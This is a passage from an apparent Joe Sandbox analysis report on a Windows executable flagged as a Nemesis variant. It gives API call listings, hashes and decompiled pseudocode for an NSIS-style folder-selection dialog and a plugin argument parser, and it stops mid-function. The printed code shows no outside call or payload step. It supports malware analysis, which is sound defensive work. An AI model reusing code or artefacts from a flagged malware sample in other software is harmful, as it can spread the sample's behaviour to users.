ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
DeleteObject.GDI32(00000000), ref: 00404D58
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
GetWindowLongW.USER32(?,000000F0), ref: 00404E93
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
ShowWindow.USER32(?,00000005), ref: 00404EB2
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
ImageList_Destroy.COMCTL32(?), ref: 00405082
GlobalFree.KERNEL32(?), ref: 00405092
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
ShowWindow.USER32(?,00000000), ref: 00405231
GetDlgItem.USER32(?,000003FE), ref: 0040523C
ShowWindow.USER32(00000000), ref: 00405243

Strings

N, xrefs: 00404EED
M, xrefs: 00404E0C
, xrefs: 0040521B

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004046E6 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004046E6(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c220; // 0x6ccd6c
				_v32 = _t82;
				_t2 = _t82 + 0x3c; // 0x0
				_t3 = _t82 + 0x38; // 0x0
				_t146 = ( *_t2 << 0xb) + 0x435000;
				_v12 =  *_t3;
				if(_a8 == 0x40b) {
					E004058C8(0x3fb, _t146);
					E00406516(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004058C8(0x3fb, _t146);
							if(E00405C5B(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406282(0x42b218, _t146);
							_t87 = E0040665C(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406282(0x42b218, _t146);
								_t89 = E00405BFE(0x42b218);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b218,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b218) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b218,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405B9F(0x42b218);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b218) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404B83(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x433ebc + 0x10)) != _t158) {
									E00404B6B(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b208);
									} else {
										E00404AA2(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404239(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d238 == _t158) {
									E0040463F();
								}
								 *0x42d238 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d248;
							_v60 = E00404A3C;
							_v56 = _t146;
							_v68 = E004062A4(_t146, 0x42d248, _t167, 0x42ba20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405B53(_t146);
								_t125 =  *((intOrPtr*)( *0x434ef4 + 0x11c));
								if( *((intOrPtr*)( *0x434ef4 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry") {
									E004062A4(_t146, 0x42d248, _t167, 0, _t125);
									if(lstrcmpiW(0x432e80, 0x42d248) != 0) {
										lstrcatW(_t146, 0x432e80);
									}
								}
								 *0x42d238 =  *0x42d238 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405BCA(_t146) != 0 && E00405BFE(_t146) == 0) {
						E00405B53(_t146);
					}
					 *0x433eb8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404217(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404217(_t167);
					E0040424C(_t166);
					_t138 = E0040665C(7);
					if(_t138 == 0) {
						L53:
						return E0040427E(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x004046e6
0x004046ec
0x004046f2
0x004046f6
0x004046f9
0x004046ff
0x0040470d
0x00404710
0x00404718
0x0040471e
0x0040471e
0x0040472a
0x0040472d
0x0040479b
0x004047a2
0x00404879
0x00404880
0x0040488f
0x0040488f
0x00404893
0x0040489d
0x004048aa
0x004048ac
0x004048ac
0x004048ba
0x004048c1
0x004048c8
0x004048cb
0x00404907
0x00404909
0x0040490f
0x00404914
0x00404918
0x0040491a
0x0040491a
0x00404936
0x00000000
0x00404938
0x0040493b
0x00404949
0x0040494f
0x00404950
0x00404953
0x00404956
0x00000000
0x00404956
0x004048cd
0x004048cf
0x004048d3
0x00000000
0x00000000
0x00000000
0x00000000
0x004048d5
0x004048d5
0x004048e2
0x004048e7
0x00000000
0x00000000
0x004048eb
0x004048ed
0x004048ed
0x004048f6
0x004048f8
0x004048fd
0x00404900
0x00404905
0x00000000
0x00000000
0x00000000
0x00000000
0x00404905
0x00404962
0x0040496c
0x0040496f
0x00404972
0x00404979
0x00404979
0x0040497b
0x0040497b
0x00404980
0x00404982
0x0040498a
0x00404991
0x00404993
0x0040499e
0x0040499e
0x00404993
0x004049ae
0x004049b8
0x004049c0
0x004049db
0x004049c2
0x004049cb
0x004049cb
0x004049c0
0x004049e0
0x004049e5
0x004049ea
0x004049f3
0x004049f3
0x004049fc
0x004049fe
0x004049fe
0x00404a0a
0x00404a12
0x00404a1c
0x00404a1c
0x00404a21
0x00000000
0x00404a21
0x004048cb
0x00404882
0x00404889
0x00000000
0x00000000
0x00000000
0x00404889
0x004047a8
0x004047b1
0x004047cb
0x004047d0
0x004047da
0x004047e1
0x004047ed
0x004047f0
0x004047f3
0x004047fa
0x00404802
0x00404805
0x00404809
0x00404810
0x00404818
0x00404872
0x0040481a
0x0040481b
0x00404822
0x0040482c
0x00404834
0x00404841
0x00404855
0x00404859
0x00404859
0x00404855
0x0040485e
0x0040486b
0x0040486b
0x00404818
0x00000000
0x004047d0
0x004047be
0x00000000
0x00000000
0x004047c4
0x00000000
0x0040472f
0x0040473c
0x00404745
0x00404752
0x00404752
0x00404759
0x0040475f
0x00404768
0x0040476b
0x0040476e
0x00404776
0x00404779
0x0040477c
0x00404782
0x00404789
0x00404790
0x00404a27
0x00404a39
0x00404796
0x00404799
0x00000000
0x00404799
0x00404790

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404735
SetWindowTextW.USER32(00000000,-00435000), ref: 0040475F
SHBrowseForFolderW.SHELL32(?), ref: 00404810
CoTaskMemFree.OLE32(00000000), ref: 0040481B
lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,-00435000), ref: 0040484D
lstrcatW.KERNEL32(-00435000,Call), ref: 00404859
SetDlgItemTextW.USER32(?,000003FB,-00435000), ref: 0040486B

Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB

Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0

GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,-00435000,00000001,0042B218,-00435000,-00435000,000003FB,-00435000), ref: 0040492E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949

Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00435000), ref: 00404B43
Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F

Strings

Call, xrefs: 00404847, 0040484C, 00404857
A, xrefs: 00404809
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry, xrefs: 00404836

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry$Call
API String ID: 2624150263-3859727251
Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t319 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
